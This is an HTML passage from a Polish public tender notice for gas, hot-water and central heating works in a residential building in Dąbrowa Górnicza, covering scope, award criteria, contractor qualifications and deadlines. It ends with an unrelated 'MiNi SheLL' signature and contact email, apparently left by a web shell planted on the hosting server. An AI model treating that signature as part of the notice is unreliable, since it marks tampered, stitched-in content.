życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE 2 :<br/>Wymiana źródła ogrzewania wraz z instalacją gazu, cwu i c.o. w budynku wielorodzinnym w Dąbrowie Górniczej przy ul. Sikorskiego 10 w ramach zadania: „Termomodernizacja gminnych budynków mieszkalnych”<br/><br/>Roboty budowlane dla instalacji gazowej obejmują:<br/>1)	wytyczenie tras przewodów instalacji gazowej,<br/>2)	wykonanie poziomów gazowych z rur stalowych czarnych bez szwu na podwieszeniach w ciągu piwnic budynku,<br/>3)	demontaż i zmiana lokalizacji instalacji zlokalizowanych w miejscu projektowanych skrzynek gazowych,<br/>4)	wykonanie pionów z połączeniem poziomów mieszkaniowych, z jednoczesnym montażem urządzeń pomiarowych ( gazomierzy i armatury),<br/>5)	roboty spawalnicze,<br/>6)	montaż 6 kotłów gazowych dwufunkyjnych z zamknięta komorą spalania,<br/>7)	sprawdzenie drożności istniejących kominów murowanych,<br/>8)	montaż przewodów powietrznych i przewodów spalinowych w istniejących kominach prefabrykowanych,<br/>9)	podłączenie przewodów powietrznych i przewodów spalinowych do kotłów dwufunkcyjnych,<br/>10) roboty montażowe w mieszkaniach, towarzyszące roboty budowlane w mieszkaniach,<br/>11) montaż systemu detekcji gazu,<br/>12) próbę szczelności instalacji,<br/>13) uruchomienie instalacji oraz prace wykończeniowe.<br/><br/>Roboty budowlane dla instalacji ciepłej wody użytkowej obejmują:<br/>1)	demontaż istniejącej instalacji ciepłej wody wraz z zaślepieniem,<br/>2)	wytyczenie nowych tras przewodów instalacji ciepłej wody,<br/>3)	wykonanie instalacji ciepłej wody użytkowej,<br/>4)	montaż wraz z zasileniem , z istniejącej instalacji wody zimnej,6 kotłów dwufunkcyjnych z osprzętem i armaturą,<br/>5)	montaż podejść wodociągowych pod zawory i baterie,<br/>6)	montaż zaworów i baterii,<br/>7)	roboty montażowe w mieszkaniach, roboty towarzyszące budowlane w mieszkaniach,<br/>8)	wykonanie płukania i prób szczelności instalacji ciepłej wody użytkowej.<br/><br/>Roboty budowlane dla instalacji centralnego ogrzewania obejmują:<br/>1)	demontaż istniejących grzejników wraz z zaworami termostatycznymi i głowicami,<br/>2)	demontaż istniejących rurociągów,<br/>3)	wytyczenie tras przewodów i kanałów,<br/>4)	przygotowanie poszczególnych elementów instalacji,<br/>5)	montaż przewodów c.o.,<br/>6)	montaż grzejników oraz armatury,<br/>7)	podłączenie do dwufunkcyjnych kotłów,<br/>8)	wykonanie płukania, prób ciśnieniowych i pomiarów wraz z regulacją.<br/><br/>Prace zostaną wykonane zgodnie z Zaświadczeniem o braku podstaw do wniesienia sprzeciwu do zgłoszenia robót budowlanych z dnia 20.08.2023 , dotyczącego „Budowy wewnętrznej instalacji gazowej w budynku wielorodzinnym w Dąbrowie Górniczej przy ul. Sikorskiego 10, działki nr 2029/1 oraz 2030 obręb 0018 Ząbkowice- Nr WUA.6743.2.191.2023.AW1”<br/><br/>Przyłącza elektryczne i wodne: <br/>1) Zamawiający nie zapewnia zasilania w energię elektryczną. Wykonawca jest zobowiązany do wystąpienia do dostawcy o przyłączenie energii elektrycznej do celów budowlanych.<br/>2) Ujęcie wody z istniejącego poboru w miejscu wskazanym przez Zamawiającego, <br/>3) Wykonawca w okresie prowadzenia budowy zobowiązany jest pokrywać koszty dotyczące energii elektrycznej, zużycia wody i odprowadzenia ścieków w porozumieniu z Zamawiającym i dostawcą mediów.<br/>Założenia ogólne: <br/>1) Podstawą do wyceny jest dokumentacja techniczna oraz przedmiar robót,<br/>2) Do wyliczonego zakresu robót wg przedmiaru robót, Wykonawca winien naliczyć koszty dodatkowe, tj.:<br/>•	zagospodarowanie placu budowy,<br/>•	zabezpieczenie placu budowy przed dostępem osób trzecich,<br/>•	zużycie wody i energii,<br/>•	zabezpieczenie robót pod względem BHP,<br/>•	koszty nadzoru właścicieli i użytkowników uzbrojenia technicznego oraz ewentualnych zabezpieczeń dodatkowych, zaleconych przez tychże właścicieli i użytkowników w trakcie prowadzenia robót,<br/>•	koszty nadzorów autorskich, w przypadku zaproponowania innych rozwiązań konstrukcyjnych wymagających akceptacji projektanta, konstruktora,<br/>•	odszkodowania za szkody wyrządzone osobom trzecim na skutek prowadzenia w/w robót.<br/>•	zapewnienia i zabezpieczenia dojść i dojazdu do posesji w trakcie realizacji robót<br/>•	prace porządkowe przyległego terenu,<br/>•	koszt wywozu i utylizacji materiałów z rozbiórki, odpadów, śmieci oraz nie-potrzebnych urządzeń. Po wykonaniu robót Wykonawca uporządkuje te-ren budowy. Wykonawca zobowiązany jest przedstawić Zamawiającemu karty składowanych odpadów. Wszystkie koszty z tym związane obciążają Wykonawcę. Sposób i miejsce składowania materiałów pochodzących z rozbiórki, pozostaje w gestii Wykonawcy. Za wszystkie szkody spowodo-wane nieprawidłowym składowaniem materiałów pochodzących z rozbiórki odpowiada Wykonawca.<br/><br/>3) Wszystkie wyroby muszą posiadać krajową deklarację lub certyfikat zgodności zgodnie z wymaganiami dla wyrobów budowlanych oraz spełniać wymagania Polskich Norm, <br/>4) Roboty budowlane należy wykonać zgodnie z załączoną dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót, wytycznymi określonymi w SWZ, z wiedzą techniczną i sztuką budowlaną, przepisami BHP i ppoż. <br/>5) Wszystkie wskazane z nazwy wyroby/materiały użyte w specyfikacji technicznej wykonania i odbioru robót budowlanych i przedmiarze robót należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Zamawiający dopuszcza składanie ofert „równoważnych” z zastrzeżeniem, że uwzględnione w wycenie produkty nie odbiegają jakością, standardem i parametrami technicznymi od założonych. Wykonawca do oferty dołączy wykaz rozwiązań równoważnych z podziałem na wyroby/materiały wymagane i wyroby materiały/oferowane.<br/>6) Wykonawca do zgłoszenia odbioru zobowiązany jest dołączyć dokumentację <br/>powykonawczą. Dokumentacja powykonawcza powinna być złożona z kompletem dokumentów w segregatorze z podziałem na poszczególne branże w 1 egz. i powinna zawierać: <br/>- spis treści, <br/>- protokół przekazania placu budowy, <br/>- Dziennik Budowy - wypełnione dzienniki budowy wraz z naniesionymi ewentualnymi zmianami w dokumentacji, <br/>- oświadczenia kierownika budowy i robót o zakończeniu budowy, <br/>- dokumentację wykonawczą wraz z naniesionymi przez uczestników procesu budowlanego zmianami występującymi w toku realizacji z podziałem na poszczególne branże, <br/>- protokoły prób i sprawdzeń (wszystkie branże), <br/>- elektrycznej, <br/>- gazowej, <br/>- ciepłej wody użytkowej, <br/>- c.o., <br/>- powykonawcze opinie kominiarskie w zakresie przewodów wentylacyjnych i spalinowych . <br/>- komplet deklaracji zgodności EC, posegregowanych atestów, DTR, gwarancji <br/>i dokumentów na poszczególne użyte materiały i urządzenia wbudowane w lokal <br/>(dokumentacja powinna być podzielona na branże /budowlaną/ elektryczną/ sanitarną/ ze stosownymi wykazami, załączone dokumenty powinny określać poszczególne elementy realizowane w toku inwestycji), <br/>- dokumentację zdjęciową budynku oraz wnętrza (w 1 egz.) przed i po wykonaniu prac - na płytach CD/DVD/ PenDrive. <br/>- dokumenty i tabele porównawcze pozwalające ocenić Zamawiającemu, co najmniej równoważność parametrów zastosowanych materiałów </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45333000-0 - Roboty instalacyjne gazowe</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Przy wyborze najkorzystniejszej oferty dla każdego Zadania zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów: cena waga 60%, okres gwarancji waga 20%, doświadczenie kierownika budowy waga 20%. <br/>2)	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku. <br/>Za najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w podanych kryteriach oceny ofert. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: <br/>Sp = C1 +C2 + C3<br/>Ogólna ilość uzyskanych punktów nie może przekroczyć 100.<br/>3)	Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>4)	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze tj. w kryterium cena. <br/>Jeżeli oferty otrzymają taką sama ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną. <br/>Jeżeli nie można dokonać wyboru oferty w sposób opisany w zdaniu powyżej, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w określonym terminie ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1.	sytuacji ekonomicznej i finansowej:<br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie sytuacji ekonomicznej i finansowej, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 500 000,00 PLN.<br/>2.	zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej lub zawodowej, w szczególności dotyczący:<br/>a)	wiedzy i doświadczenia zamawiający nie stawia warunku w tym zakresie<br/><br/>b)	osób zdolnych do wykonania zamówienia, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował osobami posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalności: <br/>-	Kierownik Budowy – osoba posiadająca uprawnienia budowlane wykonawcze w specjalności konstrukcyjno – budowlanej oraz doświadczenie w postaci pełnienia funkcji kierownika budowy na co najmniej jednej robocie budowlanej obejmującej zmianę wewnętrznej instalacji gazowej, c.o., cwu, na kwotę co najmniej 100 000,00 PLN,<br/>- Kierownik Robót Instalacyjnych - osoba posiadająca uprawnienia budowlane wykonawcze w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia;<br/>b)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz oferty załącznik nr 1 do SWZ (interaktywny formularz). Załącznik nr 10 do SWZ doświadczenie kierownika budowy - podlegające punktacji w zakresie kryterium oceny ofert nr 3. Pełnomocnictwo <br/>a)	Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. <br/>b)	W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (dotyczy również spółki cywilnej).	Kosztorys ofertowy dla Zadanie nr 1 i /lub Zadania nr 2. Zobowiązanie podmiotu trzeciego (jeżeli dotyczy) załącznik nr 9. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>W takim przypadku:<br/>-Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>-Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/>Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale II podrozdziałach 7 i 8 SWZ. składają odrębnie:<br/>-wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>-podmiot trzeci, na którego potencjał powołuje się wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby wykonawcy (załącznik nr 8);<br/>Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców, w której m.in. zostanie określony pełnomocnik uprawniony do kontaktów z zamawiającym oraz do wystawiania dokumentów związanych z płatnościami, przy czym termin, na jaki została zawarta umowa, nie może być krótszy niż termin realizacji zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana któregokolwiek postanowienia umowy wymaga zgody obu stron wyrażonej na piśmie w formie aneksu do umowy pod rygorem nieważności.<br/>2. Umowa może ulec zmianie – na pisemny wniosek Wykonawcy - w zakresie:<br/>1)	zmiany terminu realizacji zamówienia, w przypadku:<br/>a)	przerw w realizacji robót budowlanych powstałych z przyczyn nie leżących po stronie Wykonawcy;<br/>b)	powierzenia przez Zamawiającego wykonania zamówień dodatkowych lub robót zamiennych, jeżeli terminy ich powierzenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy;<br/>c)	pisemnego uzgodnienia pomiędzy Stronami dotyczącego skróceniu terminu zakończenia realizacji umowy;<br/>d)	konieczności uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji: danych, zgód lub pozwoleń osób trzecich lub właściwych organów;<br/>e)	wstrzymania przez właściwe organy realizacji prac objętych umową, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;<br/>f)	konieczności wykonania robót nie związanych z inwestycją a niezbędnych do wykonania zamówienia podstawowego<br/>h) wystąpienia „siły wyższej” w rozumieniu orzecznictwa sądowego. <br/>2)	zmiany dokonanej na podstawie art. 23 pkt 1 ustawy Prawo budowlane - zmiana w rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy;<br/>3)	zmiany dokonanej na podstawie art. 20 ust. 1 pkt 4 lit. b) ustawy Prawo budowlane - uzgodniona możliwość wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego;<br/>4)	zmiany nazw, siedziby stron umowy, numerów kont bankowych, innych danych identyfikacyjnych; <br/>5)	wysokości wynagrodzenia w przypadku zmiany ustawowej stawki podatku VAT.<br/>6)	wysokości wynagrodzenia, o którym mowa w § 2 na podstawie przyjętego przez Zamawiającego kosztorysu zamiennego, zgodnie z zapisem § 2 ust 2 umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi dokumentami za pośrednictwem platformy e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-27 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-04-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Od Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, wymagane będzie wniesienie, przed zawarciem umowy, zabezpieczenia należytego wykonania umowy w wysokości 5 % ceny całkowitej (brutto) podanej w ofercie za wykonanie całości przedmiotu zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com